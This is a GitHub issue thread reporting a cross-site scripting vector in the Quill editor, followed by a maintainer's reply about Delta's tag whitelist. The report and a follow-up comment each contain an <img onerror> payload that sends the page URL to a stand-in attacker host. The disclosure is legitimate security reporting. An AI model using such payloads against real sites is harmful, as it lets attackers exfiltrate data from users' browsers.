### ISSUE TITLE
Executing arbitrary javascript inside the quill editor

### ISSUE THREAD

**Issue by zveinn** [quilljs/quill#3299]
Hey, I found a way to inject and execute arbitrary javascript into a document which will then be executed on the other side.

**Steps:**

1. Open the developer console and find the editor window
2. inject a new < p > tag with an < img > tag inside
3. place your javascript inside the "onerror" callback for the < img > tag
4. place a faulty source as the src for the < img > tag

**Example payload:**
<img src="a" onerror="var i = document.createElement('img');i.src = 'http://maliciousdomain.com/'+window.location">
'< img src="a" onerror="var i = document.createElement('img');i.src = 'http://maliciousdomain.com/'+window.location" >'

I believe this will work on any 1.X version of Quill I tested it on 1.3.6 and it worked there. 

This might not be an issue for Quill it self since Quill is not responsible for the rendering of the final product. But, this script will trigger when the editor is open as well and that is something that requires fixing for sure. 

I´m here if you need any more details.

**Comment by zveinn** [comment]
<img src="a" onerror="var i = document.createElement('img');i.src = 'http://maliciousdomain.com/'+window.location" onsuccess="var i = document.createElement('img');i.src = 'http://maliciousdomain.com/'+window.location">

**Comment by benbro** [comment]
Quill works with [Delta](https://quilljs.com/guides/designing-the-delta-format/) which supports a predefined list of tags and attributes. Manually adding arbitrary code is not relevant. You should never trust arbitrary HTML submitted by your end users.
